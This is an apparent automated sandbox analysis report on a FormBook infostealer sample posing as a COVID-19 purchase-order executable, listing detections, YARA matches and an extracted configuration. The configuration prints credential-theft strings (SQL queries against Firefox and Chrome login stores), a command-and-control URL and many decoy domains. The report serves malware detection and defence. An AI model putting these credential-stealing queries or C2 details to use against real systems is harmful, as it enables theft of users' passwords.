Play interactive tour

Edit tour

Analysis Report Po-covid19 2372#w2..exe

Overview

General Information

Sample Name:	Po-covid19 2372#w2..exe
Analysis ID:	338985
MD5:	bf53c9dc0d0f032033c318aceef906c6
SHA1:	eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
SHA256:	a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
Tags:	COVID19exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Po-covid19 2372#w2..exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: BF53C9DC0D0F032033C318ACEEF906C6)

Po-covid19 2372#w2..exe (PID: 4308 cmdline: {path} MD5: BF53C9DC0D0F032033C318ACEEF906C6)

Po-covid19 2372#w2..exe (PID: 5404 cmdline: {path} MD5: BF53C9DC0D0F032033C318ACEEF906C6)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msiexec.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "kimberlyrutledge.com", "auctus.agency", "johnemotions.com", "guilt-brilliant.com", "wxshangdian.com", "theolivetreeonline.com", "stellarfranchisebrands.com", "every1no1.com", "hoangthanhgroup.com", "psm-gen.com", "kingdomwow.com", "digitalksr.com", "karynpolitoforlg.com", "youthdaycalgary.com", "libertyhandymanservicesllc.com", "breatheohio.com", "allenleather.com", "transformafter50.info", "hnhsylsb.com", "hmtradebd.com", "besrhodislandhomes.com", "zuwozo.com", "southernhighlandsnails.com", "kaaxg.com", "bauer-cobolt.com", "steelyourselfshop.net", "linksoflondoncharmscheap.com", "groundwork-pt.com", "beautifulangelicskin.com", "aduhelmfinancialsupport.com", "xn--carpinteratarifa-hsb.com", "thekingink.net", "ocotegrill.com", "gilbertdodge.com", "insuranceinquirer.com", "withagentcy.com", "deeparchivesvpn.com", "blamekd.com", "acsdealta.xyz", "dsxcj.com", "kimonoshihan.com", "bosquefamily.com", "5587sk.com", "integrative.life", "unitedjournal.info", "lynxdeck.com", "onlyfanyou.com", "aminomedicalscience.com", "rachenstern-technik.com", "thejewelrybox.net", "stopcolleges.com", "thesaltlifestyle.com", "tappesupportservices.com", "andrewgreenhomes.com", "meidiansc.com", "gobalexporter.com", "rvpji571m.xyz", "alwekalaaladabeya.com", "scientificimaginetics.com", "skaizenpharma.com", "balloonpost.club", "thefunnythingabout.com", "premium-vitality.com", "businesscalmcoaching.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.styrelseforum.com/p95n/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.253062095.0000000002708000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1f6580:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1f67fa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2529e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x252c5a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x20231d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x25e77d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x201e09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x25e269:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x20241f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x25e87f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x202597:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x25e9f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1f7212:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x253672:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x201084:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x25d4e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f7f0b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x25436b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x20819f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2645ff:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2091a2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2050c1:$sqlite3step: 68 34 1C 7B E1 0x2051d4:$sqlite3step: 68 34 1C 7B E1 0x261521:$sqlite3step: 68 34 1C 7B E1 0x261634:$sqlite3step: 68 34 1C 7B E1 0x2050f0:$sqlite3text: 68 38 2A 90 C5 0x205215:$sqlite3text: 68 38 2A 90 C5 0x261550:$sqlite3text: 68 38 2A 90 C5 0x261675:$sqlite3text: 68 38 2A 90 C5 0x205103:$sqlite3blob: 68 53 D8 7F 8C 0x20522b:$sqlite3blob: 68 53 D8 7F 8C 0x261563:$sqlite3blob: 68 53 D8 7F 8C 0x26168b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Po-covid19 2372#w2..exe PID: 5532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Po-covid19 2372#w2..exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Po-covid19 2372#w2..exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Po-covid19 2372#w2..exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17629:$sqlite3step: 68 34 1C 7B E1 0x1773c:$sqlite3step: 68 34 1C 7B E1 0x17658:$sqlite3text: 68 38 2A 90 C5 0x1777d:$sqlite3text: 68 38 2A 90 C5 0x1766b:$sqlite3blob: 68 53 D8 7F 8C 0x17793:$sqlite3blob: 68 53 D8 7F 8C
3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Po-covid19 2372#w2..exe

Avira: detected

Found malware configuration

Show sources

Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", 